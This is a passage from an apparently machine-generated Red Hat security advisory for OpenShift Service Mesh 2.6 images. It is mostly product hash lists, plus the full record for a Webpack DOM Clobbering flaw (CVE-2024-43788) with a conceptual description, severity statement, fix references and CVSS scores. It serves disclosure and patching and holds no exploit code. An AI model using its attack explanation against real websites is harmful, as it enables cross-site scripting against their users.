"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "curl: libcurl: ASN.1 date parser overread", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", 